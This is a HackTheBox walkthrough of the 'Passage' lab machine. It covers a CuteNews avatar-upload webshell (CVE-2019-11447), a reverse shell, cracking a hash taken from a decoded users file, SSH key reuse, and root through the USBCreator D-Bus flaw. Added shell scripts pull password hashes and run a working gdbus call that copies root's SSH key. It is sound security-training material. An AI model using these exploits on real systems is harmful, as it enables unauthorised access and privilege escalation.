Passage — HackTheBox
This is a practical walkthrough of the “Passage” machine from HackTheBox. The machine is rated medium and is worth 30 base points. Credit goes to ChefByzen for building it.
This walkthrough is deliberately explanatory, because I learned a lot of new things from this machine, so don’t mind my blabbering.
Passwords, hashes and flags are redacted to encourage you to solve those parts on your own.
We kick off, as usual, by enumerating the target with nmap.
Two ports are open, SSH and HTTP. Let’s visit the homepage.
A notice on the homepage says the admin has implemented fail2ban: send more requests than a normal visitor would and your IP is banned for two minutes. So automated scanners and brute-force tools (directory busting, credential guessing) are off the table against this target; enumeration has to be done by hand and at a low request rate.
Do not forget to add passage.htb to your /etc/hosts file. The homepage source reveals that the site runs the CuteNews news management system, and the project’s official page confirms it was last updated in 2018.
The installed version is 2.1.2, which carries a known vulnerability (CVE-2019-11447): a registered user can upload arbitrary files to the server through the avatar upload in the profile area, and from there execute code. To use it we first need to register an account and log in.
From the browse section of the profile page we can upload a PHP file containing our one-liner. First we need to create that file.
The file begins with the GIF magic bytes so that the upload filter, which inspects the file content rather than trusting the extension, treats it as an image; the PHP one-liner follows the header, and the .php extension is what makes the server execute it.
The file command duly reports it as GIF image data. Let’s upload it, intercepting the request in Burp Suite.
The response shows that our PHP file was stored on the server under a different name. To execute it we simply request that path.
The response is just the GIF header bytes, which confirms the PHP ran. Now let’s try it with the cmd parameter.
It works as expected. Next, a Python reverse-shell one-liner (any of the standard reverse-shell cheat sheets has it). Start a netcat listener on Kali, URL-encode the one-liner in Burp Suite’s Decoder and send it as the cmd parameter.
Execute it and you get a reverse shell.
Aight, *Hacker Voice* we are in. Listing the home directory shows two users.
One of them holds user.txt and the other will get us to root. Neither directory is accessible to our current user (www-data), so let’s run LinPEAS for privilege-escalation leads.
Note: even with a shell, fail2ban still throttles us whenever we pull too many resources, so the session stalls from time to time.
LinPEAS reported a couple of things worth a look. First the config file.
It is empty. Let’s look in the cdata directory instead.
This directory holds a lot of files; the interesting one is a subdirectory named “users”. Listing it shows many .php files, and several of them contain base64 strings.
The file named lines collects the contents of all those .php files in one place.
Most of it is base64-encoded. Decoding the entry below yields some juicy information.
It is the record for the user “paul”, including a password hash. Let’s identify the hashing algorithm and crack it accordingly.
That yields paul’s password. Log in over SSH and grab the user flag.
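The decoding step above, automated: read a CuteNews cdata/users/lines file, base64-decode each record, pull out the stored password hash and use its length to narrow down the algorithm before handing it to a cracker. This is an added example, not the post’s own commands; the sample file is constructed here (a PHP guard line followed by base64-encoded serialised PHP arrays, the layout the page describes) and FAKE_HASH is a dummy value, not the box’s real hash.

```shell
#!/bin/sh
# Added example, not from the original post. The record layout and the
# hash value below are constructed for the demo.

FAKE_HASH=0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef

# Write a constructed lines file to $1: a PHP guard line, then one base64
# encoded serialised PHP array per line.
make_sample() {
  {
    printf '%s\n' "<?php die('Direct call - access denied'); ?>"
    printf 'a:1:{s:5:"email";a:1:{s:16:"paul@example.htb";s:4:"paul";}}' | base64 | tr -d '\n'
    printf '\n'
    printf 'a:1:{s:2:"id";a:1:{i:1;a:4:{s:4:"name";s:4:"paul";s:5:"email";s:16:"paul@example.htb";s:4:"pass";s:64:"%s";s:3:"acl";s:1:"2";}}}' "$FAKE_HASH" | base64 | tr -d '\n'
    printf '\n'
  } > "$1"
}

# Decode every base64 record in $1, skipping the PHP guard line and blanks.
decode_lines() {
  while IFS= read -r line; do
    case "$line" in
      '<?php'*|'') continue ;;
    esac
    printf '%s' "$line" | base64 -d
    printf '\n'
  done < "$1"
}

# Print the value of each "pass" field found in the decoded records.
extract_hashes() {
  decode_lines "$1" | grep -oE '"pass";s:[0-9]+:"[0-9a-fA-F]+"' \
    | sed 's/.*"\([0-9a-fA-F]*\)"$/\1/'
}

# Digest length only narrows the candidates (a 64-hex string could also be
# SHA3-256 or BLAKE2s); run hashcat with the suggested mode to confirm.
hash_candidates() {
  case "${#1}" in
    32)  echo "MD5 (hashcat -m 0)" ;;
    40)  echo "SHA-1 (hashcat -m 100)" ;;
    64)  echo "SHA-256 (hashcat -m 1400)" ;;
    128) echo "SHA-512 (hashcat -m 1700)" ;;
    *)   echo "unrecognised length ${#1}" ;;
  esac
}

# Usage against the real file:
#   extract_hashes cdata/users/lines > hashes.txt
#   hash_candidates "$(head -n1 hashes.txt)"
#   hashcat -m <mode> hashes.txt /usr/share/wordlists/rockyou.txt
```

Cracking happens on your own machine, not on the target, so fail2ban is not a concern here; copy the lines file out over the reverse shell (base64 it first if the shell mangles binary) and work on it offline.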
paul’s home directory contains no messages or hints, the user cannot run sudo, and LinPEAS adds little. His .ssh directory, however, holds something interesting.
It seems paul and nadav are using the same SSH key. Let’s try it to log in as “nadav”.
nadav is the more privileged user. We have a shell as him but not his password, so sudo is out. Running LinPEAS as nadav gave me this.
Following the link leads to this blog post:
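Before trying a found key over the network, it is worth confirming offline that the private key in one account’s .ssh really matches an entry in the other account’s authorized_keys. The check below is an added example, not part of the original post; it assumes ssh-keygen is installed, and the demo keys it generates stand in for paul’s private key and nadav’s authorized_keys.

```shell
#!/bin/sh
# Added example, not from the original post. Assumes ssh-keygen is present.

# Key type and base64 blob of the public key derived from private key $1.
pubkey_of() {
  ssh-keygen -y -f "$1" | awk '{ print $1, $2 }'
}

# Return 0 if authorized_keys ($2) contains the key material of private key $1.
# Option prefixes (from="...", command="...") and trailing comments such as
# "nadav@passage" are ignored: only key type and blob are compared.
key_authorised_by() {
  want=$(pubkey_of "$1") || return 2
  [ -n "$want" ] || return 2
  awk '{ for (i = 1; i <= NF; i++) if ($i ~ /^(ssh-|ecdsa-|sk-)/) { print $i, $(i + 1); break } }' "$2" \
    | grep -qxF "$want"
}

# Demo with throwaway keys: one that is authorised, one that is not.
demo() {
  d=$(mktemp -d)
  ssh-keygen -q -t ed25519 -N '' -C 'nadav@passage' -f "$d/paul_id_rsa"
  ssh-keygen -q -t ed25519 -N '' -C 'unrelated' -f "$d/other_key"
  cp "$d/paul_id_rsa.pub" "$d/nadav_authorized_keys"
  if key_authorised_by "$d/paul_id_rsa" "$d/nadav_authorized_keys"; then
    echo "paul's private key is accepted by nadav's authorized_keys"
  fi
  key_authorised_by "$d/other_key" "$d/nadav_authorized_keys" || echo "unrelated key: no match"
  rm -rf "$d"
}

# On the box: key_authorised_by ~paul/.ssh/id_rsa ~nadav/.ssh/authorized_keys
# (if nadav's file is unreadable, ssh -i ~paul/.ssh/id_rsa nadav@localhost is the test).
```

If the other account’s authorized_keys is not readable, fall back to comparing fingerprints: `ssh-keygen -lf` on the private key and on any public key you can see prints the same fingerprint when they belong together.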
A vulnerability in the USBCreator D-Bus interface allows an attacker with access to a user in the sudoer group to bypass the password security policy imposed by the sudo program. The vulnerability allows an attacker to overwrite arbitrary files with arbitrary content, as root — without supplying a password. This trivially leads to elevated privileges, for instance, by overwriting the shadow file and setting a password for root.
So the same primitive lets us either copy root.txt into our own home directory or copy root’s SSH private key out. Both are quieter than the shadow-file overwrite the advisory mentions, which also works but modifies a system file on a box other people are using.
Log in as root over SSH with the copied private key and read the flag.
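The file-copy primitive and the root login above, as a script. This is an added example rather than the post’s own commands: the D-Bus destination, object path and method are those of the USBCreator interface from the quoted advisory, while the source path (/root/.ssh/id_rsa) and the use of ssh to localhost are assumptions about this box.

```shell
#!/bin/sh
# Added example, not from the original post. Assumes gdbus is installed and
# that the calling user is in the sudo group, which is what the
# root-running usbcreator helper trusts without asking for a password.

# Return 0 if the space-separated group list in $1 contains "sudo".
in_sudo_group() {
  for g in $1; do
    [ "$g" = sudo ] && return 0
  done
  return 1
}

# Ask the usbcreator helper (running as root) to write file $1 to path $2.
# The third argument of Image() is the "allow unmounted" boolean.
usbcreator_copy() {
  gdbus call --system \
    --dest com.ubuntu.USBCreator \
    --object-path /com/ubuntu/USBCreator \
    --method com.ubuntu.USBCreator.Image \
    "$1" "$2" true
}

main() {
  in_sudo_group "$(id -nG)" || { echo "current user is not in the sudo group" >&2; exit 1; }
  command -v gdbus >/dev/null 2>&1 || { echo "gdbus not found" >&2; exit 1; }
  # Assumed source path; root.txt would work the same way.
  usbcreator_copy /root/.ssh/id_rsa /tmp/root_id_rsa
  # The copy is written by root; take our own copy so ssh accepts the permissions.
  cp /tmp/root_id_rsa "$HOME/root_id_rsa" && chmod 600 "$HOME/root_id_rsa"
  ssh -i "$HOME/root_id_rsa" root@localhost 'id; cat /root/root.txt'
}

# Only run the escalation when invoked as: sh usbcreator.sh run
if [ "${1:-}" = run ]; then
  main
fi
```

The group check matters: the advisory’s wording is that the bypass needs "access to a user in the sudoer group", and nadav qualifies here even though we do not know his password, which is exactly why the D-Bus route beats sudo.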
We have both flags required to complete this machine.
Thank you for reading. While attempting this challenge I learned so many things; this was a unique target with a unique vulnerability.